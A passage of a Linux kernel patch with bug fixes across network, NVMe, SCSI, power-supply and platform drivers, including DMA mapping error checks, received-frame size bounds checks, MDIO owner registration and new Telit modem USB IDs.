++		if (dma_mapping_error(ctodev(card), cpu_addr))
+ 			goto iommu_error;
+ 
++		descr->bus_addr = cpu_to_be32(cpu_addr);
+ 		descr->next = descr + 1;
+ 		descr->prev = descr - 1;
+ 	}
+@@ -365,26 +367,28 @@ iommu_error:
+  *
+  * allocates a new rx skb, iommu-maps it and attaches it to the descriptor.
+  * Activate the descriptor state-wise
++ *
++ * Gelic RX sk_buffs must be aligned to GELIC_NET_RXBUF_ALIGN and the length
++ * must be a multiple of GELIC_NET_RXBUF_ALIGN.
+  */
+ static int gelic_descr_prepare_rx(struct gelic_card *card,
+ 				  struct gelic_descr *descr)
+ {
++	static const unsigned int rx_skb_size =
++		ALIGN(GELIC_NET_MAX_FRAME, GELIC_NET_RXBUF_ALIGN) +
++		GELIC_NET_RXBUF_ALIGN - 1;
++	dma_addr_t cpu_addr;
+ 	int offset;
+-	unsigned int bufsize;
+ 
+ 	if (gelic_descr_get_status(descr) !=  GELIC_DESCR_DMA_NOT_IN_USE)
+ 		dev_info(ctodev(card), "%s: ERROR status\n", __func__);
+-	/* we need to round up the buffer size to a multiple of 128 */
+-	bufsize = ALIGN(GELIC_NET_MAX_MTU, GELIC_NET_RXBUF_ALIGN);
+ 
+-	/* and we need to have it 128 byte aligned, therefore we allocate a
+-	 * bit more */
+-	descr->skb = dev_alloc_skb(bufsize + GELIC_NET_RXBUF_ALIGN - 1);
++	descr->skb = netdev_alloc_skb(*card->netdev, rx_skb_size);
+ 	if (!descr->skb) {
+ 		descr->buf_addr = 0; /* tell DMAC don't touch memory */
+ 		return -ENOMEM;
+ 	}
+-	descr->buf_size = cpu_to_be32(bufsize);
++	descr->buf_size = cpu_to_be32(rx_skb_size);
+ 	descr->dmac_cmd_status = 0;
+ 	descr->result_size = 0;
+ 	descr->valid_size = 0;
+@@ -395,11 +399,10 @@ static int gelic_descr_prepare_rx(struct gelic_card *card,
+ 	if (offset)
+ 		skb_reserve(descr->skb, GELIC_NET_RXBUF_ALIGN - offset);
+ 	/* io-mmu-map the skb */
+-	descr->buf_addr = cpu_to_be32(dma_map_single(ctodev(card),
+-						     descr->skb->data,
+-						     GELIC_NET_MAX_MTU,
+-						     DMA_FROM_DEVICE));
+-	if (!descr->buf_addr) {
++	cpu_addr = dma_map_single(ctodev(card), descr->skb->data,
++				  GELIC_NET_MAX_FRAME, DMA_FROM_DEVICE);
++	descr->buf_addr = cpu_to_be32(cpu_addr);
++	if (dma_mapping_error(ctodev(card), cpu_addr)) {
+ 		dev_kfree_skb_any(descr->skb);
+ 		descr->skb = NULL;
+ 		dev_info(ctodev(card),
+@@ -779,7 +782,7 @@ static int gelic_descr_prepare_tx(struct gelic_card *card,
+ 
+ 	buf = dma_map_single(ctodev(card), skb->data, skb->len, DMA_TO_DEVICE);
+ 
+-	if (!buf) {
++	if (dma_mapping_error(ctodev(card), buf)) {
+ 		dev_err(ctodev(card),
+ 			"dma map 2 failed (%p, %i). Dropping packet\n",
+ 			skb->data, skb->len);
+@@ -915,7 +918,7 @@ static void gelic_net_pass_skb_up(struct gelic_descr *descr,
+ 	data_error = be32_to_cpu(descr->data_error);
+ 	/* unmap skb buffer */
+ 	dma_unmap_single(ctodev(card), be32_to_cpu(descr->buf_addr),
+-			 GELIC_NET_MAX_MTU,
++			 GELIC_NET_MAX_FRAME,
+ 			 DMA_FROM_DEVICE);
+ 
+ 	skb_put(skb, be32_to_cpu(descr->valid_size)?
+diff --git a/drivers/net/ethernet/toshiba/ps3_gelic_net.h b/drivers/net/ethernet/toshiba/ps3_gelic_net.h
+index 68f324ed4eaf0..0d98defb011ed 100644
+--- a/drivers/net/ethernet/toshiba/ps3_gelic_net.h
++++ b/drivers/net/ethernet/toshiba/ps3_gelic_net.h
+@@ -19,8 +19,9 @@
+ #define GELIC_NET_RX_DESCRIPTORS        128 /* num of descriptors */
+ #define GELIC_NET_TX_DESCRIPTORS        128 /* num of descriptors */
+ 
+-#define GELIC_NET_MAX_MTU               VLAN_ETH_FRAME_LEN
+-#define GELIC_NET_MIN_MTU               VLAN_ETH_ZLEN
++#define GELIC_NET_MAX_FRAME             2312
++#define GELIC_NET_MAX_MTU               2294
++#define GELIC_NET_MIN_MTU               64
+ #define GELIC_NET_RXBUF_ALIGN           128
+ #define GELIC_CARD_RX_CSUM_DEFAULT      1 /* hw chksum */
+ #define GELIC_NET_WATCHDOG_TIMEOUT      5*HZ
+diff --git a/drivers/net/ethernet/xircom/xirc2ps_cs.c b/drivers/net/ethernet/xircom/xirc2ps_cs.c
+index 894e92ef415b9..9f505cf02d965 100644
+--- a/drivers/net/ethernet/xircom/xirc2ps_cs.c
++++ b/drivers/net/ethernet/xircom/xirc2ps_cs.c
+@@ -503,6 +503,11 @@ static void
+ xirc2ps_detach(struct pcmcia_device *link)
+ {
+     struct net_device *dev = link->priv;
++    struct local_info *local = netdev_priv(dev);
++
++    netif_carrier_off(dev);
++    netif_tx_disable(dev);
++    cancel_work_sync(&local->tx_timeout_task);
+ 
+     dev_dbg(&link->dev, "detach\n");
+ 
+diff --git a/drivers/net/ieee802154/ca8210.c b/drivers/net/ieee802154/ca8210.c
+index e1a569b99e4a6..0b0c6c0764fe9 100644
+--- a/drivers/net/ieee802154/ca8210.c
++++ b/drivers/net/ieee802154/ca8210.c
+@@ -1913,6 +1913,8 @@ static int ca8210_skb_tx(
+ 	 * packet
+ 	 */
+ 	mac_len = ieee802154_hdr_peek_addrs(skb, &header);
++	if (mac_len < 0)
++		return mac_len;
+ 
+ 	secspec.security_level = header.sec.level;
+ 	secspec.key_id_mode = header.sec.key_id_mode;
+diff --git a/drivers/net/mdio/acpi_mdio.c b/drivers/net/mdio/acpi_mdio.c
+index d77c987fda9cd..4630dde019749 100644
+--- a/drivers/net/mdio/acpi_mdio.c
++++ b/drivers/net/mdio/acpi_mdio.c
+@@ -18,16 +18,18 @@ MODULE_AUTHOR("Calvin Johnson <calvin.johnson@oss.nxp.com>");
+ MODULE_LICENSE("GPL");
+ 
+ /**
+- * acpi_mdiobus_register - Register mii_bus and create PHYs from the ACPI ASL.
++ * __acpi_mdiobus_register - Register mii_bus and create PHYs from the ACPI ASL.
+  * @mdio: pointer to mii_bus structure
+ * @fwnode: pointer to fwnode of MDIO bus. This fwnode is expected to represent
+ * an ACPI device object corresponding to the MDIO bus and its children are
+ * expected to correspond to the PHY devices on that bus.
++ * @owner: module owning this @mdio object.
+  *
+  * This function registers the mii_bus structure and registers a phy_device
+  * for each child node of @fwnode.
+  */
+-int acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode)
++int __acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode,
++			    struct module *owner)
+ {
+ 	struct fwnode_handle *child;
+ 	u32 addr;
+@@ -35,7 +37,7 @@ int acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode)
+ 
+ 	/* Mask out all PHYs from auto probing. */
+ 	mdio->phy_mask = GENMASK(31, 0);
+-	ret = mdiobus_register(mdio);
++	ret = __mdiobus_register(mdio, owner);
+ 	if (ret)
+ 		return ret;
+ 
+@@ -55,4 +57,4 @@ int acpi_mdiobus_register(struct mii_bus *mdio, struct fwnode_handle *fwnode)
+ 	}
+ 	return 0;
+ }
+-EXPORT_SYMBOL(acpi_mdiobus_register);
++EXPORT_SYMBOL(__acpi_mdiobus_register);
+diff --git a/drivers/net/mdio/mdio-thunder.c b/drivers/net/mdio/mdio-thunder.c
+index 822d2cdd2f359..394b864aaa372 100644
+--- a/drivers/net/mdio/mdio-thunder.c
++++ b/drivers/net/mdio/mdio-thunder.c
+@@ -104,6 +104,7 @@ static int thunder_mdiobus_pci_probe(struct pci_dev *pdev,
+ 		if (i >= ARRAY_SIZE(nexus->buses))
+ 			break;
+ 	}
++	fwnode_handle_put(fwn);
+ 	return 0;
+ 
+ err_release_regions:
+diff --git a/drivers/net/mdio/of_mdio.c b/drivers/net/mdio/of_mdio.c
+index 510822d6d0d90..1e46e39f5f46a 100644
+--- a/drivers/net/mdio/of_mdio.c
++++ b/drivers/net/mdio/of_mdio.c
+@@ -139,21 +139,23 @@ bool of_mdiobus_child_is_phy(struct device_node *child)
+ EXPORT_SYMBOL(of_mdiobus_child_is_phy);
+ 
+ /**
+- * of_mdiobus_register - Register mii_bus and create PHYs from the device tree
++ * __of_mdiobus_register - Register mii_bus and create PHYs from the device tree
+  * @mdio: pointer to mii_bus structure
+  * @np: pointer to device_node of MDIO bus.
++ * @owner: module owning the @mdio object.
+  *
+  * This function registers the mii_bus structure and registers a phy_device
+  * for each child node of @np.
+  */
+-int of_mdiobus_register(struct mii_bus *mdio, struct device_node *np)
++int __of_mdiobus_register(struct mii_bus *mdio, struct device_node *np,
++			  struct module *owner)
+ {
+ 	struct device_node *child;
+ 	bool scanphys = false;
+ 	int addr, rc;
+ 
+ 	if (!np)
+-		return mdiobus_register(mdio);
++		return __mdiobus_register(mdio, owner);
+ 
+ 	/* Do not continue if the node is disabled */
+ 	if (!of_device_is_available(np))
+@@ -172,7 +174,7 @@ int of_mdiobus_register(struct mii_bus *mdio, struct device_node *np)
+ 	of_property_read_u32(np, "reset-post-delay-us", &mdio->reset_post_delay_us);
+ 
+ 	/* Register the MDIO bus */
+-	rc = mdiobus_register(mdio);
++	rc = __mdiobus_register(mdio, owner);
+ 	if (rc)
+ 		return rc;
+ 
+@@ -236,7 +238,7 @@ unregister:
+ 	mdiobus_unregister(mdio);
+ 	return rc;
+ }
+-EXPORT_SYMBOL(of_mdiobus_register);
++EXPORT_SYMBOL(__of_mdiobus_register);
+ 
+ /**
+  * of_mdio_find_device - Given a device tree node, find the mdio_device
+diff --git a/drivers/net/phy/mdio_devres.c b/drivers/net/phy/mdio_devres.c
+index b560e99695dfd..69b829e6ab35b 100644
+--- a/drivers/net/phy/mdio_devres.c
++++ b/drivers/net/phy/mdio_devres.c
+@@ -98,13 +98,14 @@ EXPORT_SYMBOL(__devm_mdiobus_register);
+ 
+ #if IS_ENABLED(CONFIG_OF_MDIO)
+ /**
+- * devm_of_mdiobus_register - Resource managed variant of of_mdiobus_register()
++ * __devm_of_mdiobus_register - Resource managed variant of of_mdiobus_register()
+  * @dev:	Device to register mii_bus for
+  * @mdio:	MII bus structure to register
+  * @np:		Device node to parse
++ * @owner:	Owning module
+  */
+-int devm_of_mdiobus_register(struct device *dev, struct mii_bus *mdio,
+-			     struct device_node *np)
++int __devm_of_mdiobus_register(struct device *dev, struct mii_bus *mdio,
++			       struct device_node *np, struct module *owner)
+ {
+ 	struct mdiobus_devres *dr;
+ 	int ret;
+@@ -117,7 +118,7 @@ int devm_of_mdiobus_register(struct device *dev, struct mii_bus *mdio,
+ 	if (!dr)
+ 		return -ENOMEM;
+ 
+-	ret = of_mdiobus_register(mdio, np);
++	ret = __of_mdiobus_register(mdio, np, owner);
+ 	if (ret) {
+ 		devres_free(dr);
+ 		return ret;
+@@ -127,7 +128,7 @@ int devm_of_mdiobus_register(struct device *dev, struct mii_bus *mdio,
+ 	devres_add(dev, dr);
+ 	return 0;
+ }
+-EXPORT_SYMBOL(devm_of_mdiobus_register);
++EXPORT_SYMBOL(__devm_of_mdiobus_register);
+ #endif /* CONFIG_OF_MDIO */
+ 
+ MODULE_LICENSE("GPL");
+diff --git a/drivers/net/phy/phy.c b/drivers/net/phy/phy.c
+index e5b6cb1a77f95..a8bf3c752c8a2 100644
+--- a/drivers/net/phy/phy.c
++++ b/drivers/net/phy/phy.c
+@@ -57,6 +57,18 @@ static const char *phy_state_to_str(enum phy_state st)
+ 	return NULL;
+ }
+ 
++static void phy_process_state_change(struct phy_device *phydev,
++				     enum phy_state old_state)
++{
++	if (old_state != phydev->state) {
++		phydev_dbg(phydev, "PHY state change %s -> %s\n",
++			   phy_state_to_str(old_state),
++			   phy_state_to_str(phydev->state));
++		if (phydev->drv && phydev->drv->link_change_notify)
++			phydev->drv->link_change_notify(phydev);
++	}
++}
++
+ static void phy_link_up(struct phy_device *phydev)
+ {
+ 	phydev->phy_link_change(phydev, true);
+@@ -1094,6 +1106,7 @@ EXPORT_SYMBOL(phy_free_interrupt);
+ void phy_stop(struct phy_device *phydev)
+ {
+ 	struct net_device *dev = phydev->attached_dev;
++	enum phy_state old_state;
+ 
+ 	if (!phy_is_started(phydev) && phydev->state != PHY_DOWN) {
+ 		WARN(1, "called from state %s\n",
+@@ -1102,6 +1115,7 @@ void phy_stop(struct phy_device *phydev)
+ 	}
+ 
+ 	mutex_lock(&phydev->lock);
++	old_state = phydev->state;
+ 
+ 	if (phydev->state == PHY_CABLETEST) {
+ 		phy_abort_cable_test(phydev);
+@@ -1112,6 +1126,7 @@ void phy_stop(struct phy_device *phydev)
+ 		sfp_upstream_stop(phydev->sfp_bus);
+ 
+ 	phydev->state = PHY_HALTED;
++	phy_process_state_change(phydev, old_state);
+ 
+ 	mutex_unlock(&phydev->lock);
+ 
+@@ -1229,13 +1244,7 @@ void phy_state_machine(struct work_struct *work)
+ 	if (err < 0)
+ 		phy_error(phydev);
+ 
+-	if (old_state != phydev->state) {
+-		phydev_dbg(phydev, "PHY state change %s -> %s\n",
+-			   phy_state_to_str(old_state),
+-			   phy_state_to_str(phydev->state));
+-		if (phydev->drv && phydev->drv->link_change_notify)
+-			phydev->drv->link_change_notify(phydev);
+-	}
++	phy_process_state_change(phydev, old_state);
+ 
+ 	/* Only re-schedule a PHY state machine change if we are polling the
+ 	 * PHY, if PHY_MAC_INTERRUPT is set, then we will be moving
+diff --git a/drivers/net/usb/asix_devices.c b/drivers/net/usb/asix_devices.c
+index 743cbf5d662c9..f7cff58fe0449 100644
+--- a/drivers/net/usb/asix_devices.c
++++ b/drivers/net/usb/asix_devices.c
+@@ -666,8 +666,9 @@ static int asix_resume(struct usb_interface *intf)
+ static int ax88772_init_mdio(struct usbnet *dev)
+ {
+ 	struct asix_common_private *priv = dev->driver_priv;
++	int ret;
+ 
+-	priv->mdio = devm_mdiobus_alloc(&dev->udev->dev);
++	priv->mdio = mdiobus_alloc();
+ 	if (!priv->mdio)
+ 		return -ENOMEM;
+ 
+@@ -679,7 +680,20 @@ static int ax88772_init_mdio(struct usbnet *dev)
+ 	snprintf(priv->mdio->id, MII_BUS_ID_SIZE, "usb-%03d:%03d",
+ 		 dev->udev->bus->busnum, dev->udev->devnum);
+ 
+-	return devm_mdiobus_register(&dev->udev->dev, priv->mdio);
++	ret = mdiobus_register(priv->mdio);
++	if (ret) {
++		netdev_err(dev->net, "Could not register MDIO bus (err %d)\n", ret);
++		mdiobus_free(priv->mdio);
++		priv->mdio = NULL;
++	}
++
++	return ret;
++}
++
++static void ax88772_mdio_unregister(struct asix_common_private *priv)
++{
++	mdiobus_unregister(priv->mdio);
++	mdiobus_free(priv->mdio);
+ }
+ 
+ static int ax88772_init_phy(struct usbnet *dev)
+@@ -896,16 +910,23 @@ static int ax88772_bind(struct usbnet *dev, struct usb_interface *intf)
+ 
+ 	ret = ax88772_init_mdio(dev);
+ 	if (ret)
+-		return ret;
++		goto mdio_err;
+ 
+ 	ret = ax88772_phylink_setup(dev);
+ 	if (ret)
+-		return ret;
++		goto phylink_err;
+ 
+ 	ret = ax88772_init_phy(dev);
+ 	if (ret)
+-		phylink_destroy(priv->phylink);
++		goto initphy_err;
+ 
++	return 0;
++
++initphy_err:
++	phylink_destroy(priv->phylink);
++phylink_err:
++	ax88772_mdio_unregister(priv);
++mdio_err:
+ 	return ret;
+ }
+ 
+@@ -926,6 +947,7 @@ static void ax88772_unbind(struct usbnet *dev, struct usb_interface *intf)
+ 	phylink_disconnect_phy(priv->phylink);
+ 	rtnl_unlock();
+ 	phylink_destroy(priv->phylink);
++	ax88772_mdio_unregister(priv);
+ 	asix_rx_fixup_common_free(dev->driver_priv);
+ }
+ 
+diff --git a/drivers/net/usb/cdc_mbim.c b/drivers/net/usb/cdc_mbim.c
+index c89639381eca3..cd4083e0b3b9e 100644
+--- a/drivers/net/usb/cdc_mbim.c
++++ b/drivers/net/usb/cdc_mbim.c
+@@ -665,6 +665,11 @@ static const struct usb_device_id mbim_devs[] = {
+ 	  .driver_info = (unsigned long)&cdc_mbim_info_avoid_altsetting_toggle,
+ 	},
+ 
++	/* Telit FE990 */
++	{ USB_DEVICE_AND_INTERFACE_INFO(0x1bc7, 0x1081, USB_CLASS_COMM, USB_CDC_SUBCLASS_MBIM, USB_CDC_PROTO_NONE),
++	  .driver_info = (unsigned long)&cdc_mbim_info_avoid_altsetting_toggle,
++	},
++
+ 	/* default entry */
+ 	{ USB_INTERFACE_INFO(USB_CLASS_COMM, USB_CDC_SUBCLASS_MBIM, USB_CDC_PROTO_NONE),
+ 	  .driver_info = (unsigned long)&cdc_mbim_info_zlp,
+diff --git a/drivers/net/usb/lan78xx.c b/drivers/net/usb/lan78xx.c
+index 068488890d57b..c458c030fadf6 100644
+--- a/drivers/net/usb/lan78xx.c
++++ b/drivers/net/usb/lan78xx.c
+@@ -3579,13 +3579,29 @@ static int lan78xx_rx(struct lan78xx_net *dev, struct sk_buff *skb,
+ 		size = (rx_cmd_a & RX_CMD_A_LEN_MASK_);
+ 		align_count = (4 - ((size + RXW_PADDING) % 4)) % 4;
+ 
++		if (unlikely(size > skb->len)) {
++			netif_dbg(dev, rx_err, dev->net,
++				  "size err rx_cmd_a=0x%08x\n",
++				  rx_cmd_a);
++			return 0;
++		}
++
+ 		if (unlikely(rx_cmd_a & RX_CMD_A_RED_)) {
+ 			netif_dbg(dev, rx_err, dev->net,
+ 				  "Error rx_cmd_a=0x%08x", rx_cmd_a);
+ 		} else {
+-			u32 frame_len = size - ETH_FCS_LEN;
++			u32 frame_len;
+ 			struct sk_buff *skb2;
+ 
++			if (unlikely(size < ETH_FCS_LEN)) {
++				netif_dbg(dev, rx_err, dev->net,
++					  "size err rx_cmd_a=0x%08x\n",
++					  rx_cmd_a);
++				return 0;
++			}
++
++			frame_len = size - ETH_FCS_LEN;
++
+ 			skb2 = napi_alloc_skb(&dev->napi, frame_len);
+ 			if (!skb2)
+ 				return 0;
+diff --git a/drivers/net/usb/qmi_wwan.c b/drivers/net/usb/qmi_wwan.c
+index a808d718c0123..571e37e67f9ce 100644
+--- a/drivers/net/usb/qmi_wwan.c
++++ b/drivers/net/usb/qmi_wwan.c
+@@ -1364,6 +1364,7 @@ static const struct usb_device_id products[] = {
+ 	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1057, 2)},	/* Telit FN980 */
+ 	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1060, 2)},	/* Telit LN920 */
+ 	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1070, 2)},	/* Telit FN990 */
++	{QMI_QUIRK_SET_DTR(0x1bc7, 0x1080, 2)}, /* Telit FE990 */
+ 	{QMI_FIXED_INTF(0x1bc7, 0x1100, 3)},	/* Telit ME910 */
+ 	{QMI_FIXED_INTF(0x1bc7, 0x1101, 3)},	/* Telit ME910 dual modem */
+ 	{QMI_FIXED_INTF(0x1bc7, 0x1200, 5)},	/* Telit LE920 */
+diff --git a/drivers/net/usb/smsc95xx.c b/drivers/net/usb/smsc95xx.c
+index 32d2c60d334dc..563ecd27b93ea 100644
+--- a/drivers/net/usb/smsc95xx.c
++++ b/drivers/net/usb/smsc95xx.c
+@@ -1833,6 +1833,12 @@ static int smsc95xx_rx_fixup(struct usbnet *dev, struct sk_buff *skb)
+ 		size = (u16)((header & RX_STS_FL_) >> 16);
+ 		align_count = (4 - ((size + NET_IP_ALIGN) % 4)) % 4;
+ 
++		if (unlikely(size > skb->len)) {
++			netif_dbg(dev, rx_err, dev->net,
++				  "size err header=0x%08x\n", header);
++			return 0;
++		}
++
+ 		if (unlikely(header & RX_STS_ES_)) {
+ 			netif_dbg(dev, rx_err, dev->net,
+ 				  "Error header=0x%08x\n", header);
+diff --git a/drivers/net/wireguard/queueing.h b/drivers/net/wireguard/queueing.h
+index 583adb37ee1e3..125284b346a77 100644
+--- a/drivers/net/wireguard/queueing.h
++++ b/drivers/net/wireguard/queueing.h
+@@ -106,7 +106,7 @@ static inline int wg_cpumask_choose_online(int *stored_cpu, unsigned int id)
+ {
+ 	unsigned int cpu = *stored_cpu, cpu_index, i;
+ 
+-	if (unlikely(cpu == nr_cpumask_bits ||
++	if (unlikely(cpu >= nr_cpu_ids ||
+ 		     !cpumask_test_cpu(cpu, cpu_online_mask))) {
+ 		cpu_index = id % cpumask_weight(cpu_online_mask);
+ 		cpu = cpumask_first(cpu_online_mask);
+diff --git a/drivers/net/wireless/mediatek/mt76/mac80211.c b/drivers/net/wireless/mediatek/mt76/mac80211.c
+index fc608b369b3cc..d75e999a80e1f 100644
+--- a/drivers/net/wireless/mediatek/mt76/mac80211.c
++++ b/drivers/net/wireless/mediatek/mt76/mac80211.c
+@@ -526,6 +526,7 @@ int mt76_register_phy(struct mt76_phy *phy, bool vht,
+ 	if (ret)
+ 		return ret;
+ 
++	set_bit(MT76_STATE_REGISTERED, &phy->state);
+ 	phy->dev->phys[phy->band_idx] = phy;
+ 
+ 	return 0;
+@@ -536,6 +537,9 @@ void mt76_unregister_phy(struct mt76_phy *phy)
+ {
+ 	struct mt76_dev *dev = phy->dev;
+ 
++	if (!test_bit(MT76_STATE_REGISTERED, &phy->state))
++		return;
++
+ 	mt76_tx_status_check(dev, true);
+ 	ieee80211_unregister_hw(phy->hw);
+ 	dev->phys[phy->band_idx] = NULL;
+@@ -663,6 +667,7 @@ int mt76_register_device(struct mt76_dev *dev, bool vht,
+ 		return ret;
+ 
+ 	WARN_ON(mt76_worker_setup(hw, &dev->tx_worker, NULL, "tx"));
++	set_bit(MT76_STATE_REGISTERED, &phy->state);
+ 	sched_set_fifo_low(dev->tx_worker.task);
+ 
+ 	return 0;
+@@ -673,6 +678,9 @@ void mt76_unregister_device(struct mt76_dev *dev)
+ {
+ 	struct ieee80211_hw *hw = dev->hw;
+ 
++	if (!test_bit(MT76_STATE_REGISTERED, &dev->phy.state))
++		return;
++
+ 	if (IS_ENABLED(CONFIG_MT76_LEDS))
+ 		mt76_led_cleanup(dev);
+ 	mt76_tx_status_check(dev, true);
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76.h b/drivers/net/wireless/mediatek/mt76/mt76.h
+index 32a77a0ae9da9..d8216243b0224 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76.h
++++ b/drivers/net/wireless/mediatek/mt76/mt76.h
+@@ -399,6 +399,7 @@ struct mt76_tx_cb {
+ 
+ enum {
+ 	MT76_STATE_INITIALIZED,
++	MT76_STATE_REGISTERED,
+ 	MT76_STATE_RUNNING,
+ 	MT76_STATE_MCU_RUNNING,
+ 	MT76_SCANNING,
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
+index 5a047e630860f..d106cbfc387c8 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mcu.c
+@@ -1221,6 +1221,9 @@ EXPORT_SYMBOL_GPL(mt76_connac_mcu_sta_ba_tlv);
+ 
+ int mt76_connac_mcu_sta_wed_update(struct mt76_dev *dev, struct sk_buff *skb)
+ {
++	if (!mt76_is_mmio(dev))
++		return 0;
++
+ 	if (!mtk_wed_device_active(&dev->mmio.wed))
+ 		return 0;
+ 
+diff --git a/drivers/nvme/host/ioctl.c b/drivers/nvme/host/ioctl.c
+index 06f52db34be9b..3a6f41a45f9bc 100644
+--- a/drivers/nvme/host/ioctl.c
++++ b/drivers/nvme/host/ioctl.c
+@@ -463,7 +463,8 @@ static inline struct nvme_uring_cmd_pdu *nvme_uring_cmd_pdu(
+ 	return (struct nvme_uring_cmd_pdu *)&ioucmd->pdu;
+ }
+ 
+-static void nvme_uring_task_meta_cb(struct io_uring_cmd *ioucmd)
++static void nvme_uring_task_meta_cb(struct io_uring_cmd *ioucmd,
++				    unsigned issue_flags)
+ {
+ 	struct nvme_uring_cmd_pdu *pdu = nvme_uring_cmd_pdu(ioucmd);
+ 	struct request *req = pdu->req;
+@@ -484,17 +485,18 @@ static void nvme_uring_task_meta_cb(struct io_uring_cmd *ioucmd)
+ 		blk_rq_unmap_user(req->bio);
+ 	blk_mq_free_request(req);
+ 
+-	io_uring_cmd_done(ioucmd, status, result);
++	io_uring_cmd_done(ioucmd, status, result, issue_flags);
+ }
+ 
+-static void nvme_uring_task_cb(struct io_uring_cmd *ioucmd)
++static void nvme_uring_task_cb(struct io_uring_cmd *ioucmd,
++			       unsigned issue_flags)
+ {
+ 	struct nvme_uring_cmd_pdu *pdu = nvme_uring_cmd_pdu(ioucmd);
+ 
+ 	if (pdu->bio)
+ 		blk_rq_unmap_user(pdu->bio);
+ 
+-	io_uring_cmd_done(ioucmd, pdu->nvme_status, pdu->u.result);
++	io_uring_cmd_done(ioucmd, pdu->nvme_status, pdu->u.result, issue_flags);
+ }
+ 
+ static enum rq_end_io_ret nvme_uring_cmd_end_io(struct request *req,
+@@ -516,7 +518,7 @@ static enum rq_end_io_ret nvme_uring_cmd_end_io(struct request *req,
+ 	 * Otherwise, move the completion to task work.
+ 	 */
+ 	if (cookie != NULL && blk_rq_is_poll(req))
+-		nvme_uring_task_cb(ioucmd);
++		nvme_uring_task_cb(ioucmd, IO_URING_F_UNLOCKED);
+ 	else
+ 		io_uring_cmd_complete_in_task(ioucmd, nvme_uring_task_cb);
+ 
+@@ -538,7 +540,7 @@ static enum rq_end_io_ret nvme_uring_cmd_end_io_meta(struct request *req,
+ 	 * Otherwise, move the completion to task work.
+ 	 */
+ 	if (cookie != NULL && blk_rq_is_poll(req))
+-		nvme_uring_task_meta_cb(ioucmd);
++		nvme_uring_task_meta_cb(ioucmd, IO_URING_F_UNLOCKED);
+ 	else
+ 		io_uring_cmd_complete_in_task(ioucmd, nvme_uring_task_meta_cb);
+ 
+diff --git a/drivers/platform/chrome/cros_ec_chardev.c b/drivers/platform/chrome/cros_ec_chardev.c
+index 0de7c255254e0..d6de5a2941282 100644
+--- a/drivers/platform/chrome/cros_ec_chardev.c
++++ b/drivers/platform/chrome/cros_ec_chardev.c
+@@ -284,7 +284,7 @@ static long cros_ec_chardev_ioctl_xcmd(struct cros_ec_dev *ec, void __user *arg)
+ 	    u_cmd.insize > EC_MAX_MSG_BYTES)
+ 		return -EINVAL;
+ 
+-	s_cmd = kmalloc(sizeof(*s_cmd) + max(u_cmd.outsize, u_cmd.insize),
++	s_cmd = kzalloc(sizeof(*s_cmd) + max(u_cmd.outsize, u_cmd.insize),
+ 			GFP_KERNEL);
+ 	if (!s_cmd)
+ 		return -ENOMEM;
+diff --git a/drivers/platform/x86/intel/int3472/tps68470_board_data.c b/drivers/platform/x86/intel/int3472/tps68470_board_data.c
+index 309eab9c05588..322237e056f32 100644
+--- a/drivers/platform/x86/intel/int3472/tps68470_board_data.c
++++ b/drivers/platform/x86/intel/int3472/tps68470_board_data.c
+@@ -159,9 +159,10 @@ static const struct int3472_tps68470_board_data surface_go_tps68470_board_data =
+ static const struct int3472_tps68470_board_data surface_go3_tps68470_board_data = {
+ 	.dev_name = "i2c-INT3472:01",
+ 	.tps68470_regulator_pdata = &surface_go_tps68470_pdata,
+-	.n_gpiod_lookups = 1,
++	.n_gpiod_lookups = 2,
+ 	.tps68470_gpio_lookup_tables = {
+-		&surface_go_int347a_gpios
++		&surface_go_int347a_gpios,
++		&surface_go_int347e_gpios,
+ 	},
+ };
+ 
+diff --git a/drivers/power/supply/bq24190_charger.c b/drivers/power/supply/bq24190_charger.c
+index 2b2c3a4391c19..6bd711932e06d 100644
+--- a/drivers/power/supply/bq24190_charger.c
++++ b/drivers/power/supply/bq24190_charger.c
+@@ -1906,6 +1906,7 @@ static void bq24190_remove(struct i2c_client *client)
+ 	struct bq24190_dev_info *bdi = i2c_get_clientdata(client);
+ 	int error;
+ 
++	cancel_delayed_work_sync(&bdi->input_current_limit_work);
+ 	error = pm_runtime_resume_and_get(bdi->dev);
+ 	if (error < 0)
+ 		dev_warn(bdi->dev, "pm_runtime_get failed: %i\n", error);
+diff --git a/drivers/power/supply/da9150-charger.c b/drivers/power/supply/da9150-charger.c
+index f9314cc0cd75f..6b987da586556 100644
+--- a/drivers/power/supply/da9150-charger.c
++++ b/drivers/power/supply/da9150-charger.c
+@@ -662,6 +662,7 @@ static int da9150_charger_remove(struct platform_device *pdev)
+ 
+ 	if (!IS_ERR_OR_NULL(charger->usb_phy))
+ 		usb_unregister_notifier(charger->usb_phy, &charger->otg_nb);
++	cancel_work_sync(&charger->otg_work);
+ 
+ 	power_supply_unregister(charger->battery);
+ 	power_supply_unregister(charger->usb);
+diff --git a/drivers/scsi/device_handler/scsi_dh_alua.c b/drivers/scsi/device_handler/scsi_dh_alua.c
+index 29a2865b8e2e1..e436eaa3a9071 100644
+--- a/drivers/scsi/device_handler/scsi_dh_alua.c
++++ b/drivers/scsi/device_handler/scsi_dh_alua.c
+@@ -1139,10 +1139,12 @@ static int alua_activate(struct scsi_device *sdev,
+ 	rcu_read_unlock();
+ 	mutex_unlock(&h->init_mutex);
+ 
+-	if (alua_rtpg_queue(pg, sdev, qdata, true))
++	if (alua_rtpg_queue(pg, sdev, qdata, true)) {
+ 		fn = NULL;
+-	else
++	} else {
++		kfree(qdata);
+ 		err = SCSI_DH_DEV_OFFLINED;
++	}
+ 	kref_put(&pg->kref, release_port_group);
+ out:
+ 	if (fn)
+diff --git a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
+index 0c3fcb8078062..a63279f55d096 100644
+--- a/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
++++ b/drivers/scsi/hisi_sas/hisi_sas_v3_hw.c
